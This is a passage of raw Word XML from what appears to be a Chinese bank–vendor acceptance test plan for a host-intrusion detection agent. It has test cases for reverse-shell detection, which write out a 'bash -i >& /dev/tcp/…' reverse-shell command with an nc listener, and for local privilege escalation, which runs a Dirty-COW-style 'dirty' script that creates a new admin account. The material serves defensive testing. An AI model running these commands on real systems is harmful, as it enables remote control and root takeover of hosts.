              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>一台靶机，一台攻击机器，拿到靶机的webshell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测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>模拟黑客在Oracle-76-01上执行：nc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> -l 7777,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>在Oracle-76-02上执行攻击命令：bash -i &gt;&amp; /dev/tcp/&lt;Oracle-76-01的IP&gt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>7777</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>检验Oracle-76-01上输入命令:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>ip a |grep inet 确认返回的ip是Oracle-76-02的ip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:spacing w:after="200"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>检验Agent是否能够识别出攻击行为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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>服务端上有反弹shell告警记录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测试工具：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试记录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="72"/>
              <w:rPr>
                <w:rFonts w:eastAsia="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Tahoma" w:hAnsi="Tahoma" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>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备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="777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rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>人员签字</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7776" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>建行：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">        厂商：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>____________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc11626"/>
      <w:bookmarkStart w:id="43" w:name="_Toc1024392320"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:t>本地提权检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="28"/>
        <w:tblW w:w="93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7"/>
        <w:gridCol w:w="8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317"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案例编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>本地提权检查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317" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试目的；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>支持检测本地提权行为。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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317"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预置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>登录服务端</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>redhat-67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>上新建</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>账号并设置修改密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> useradd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>;passwd test,根据提示设置密码为ccb@2020</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>将提权脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>dirty.zip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>上传至</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>redhat-67-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>主机的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/home/test目录下,并解压</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>注：仅限4.8.3&gt;kernel&gt;2.6.22的内核存在提权漏洞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317" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="仿宋_GB2312" w:hAnsi="宋体" w:eastAsia="仿宋_GB2312" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>测试拓扑：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="2940"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz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9" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1317"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测试方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>.用低权限账户test登录主机</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ssh test@{</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> redhat-67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ip}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2.执行赋权命令chmod</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>+x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>dirty，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>执行提权脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>./dirty(根据脚本提示创建新管理员用户密码，等待提权结束后会提示输入之前创建的新管理员密码并输入密码进行登录)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>.提权成功后在服务端查看告警</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>注：提权后登录提权的帐号，把服务器原本的passwd还原回去，不做此步骤的话可能引起服务器异常，执行命令为：cp /tmp/passwd.bak /etc/passwd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317"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8059" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="312"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
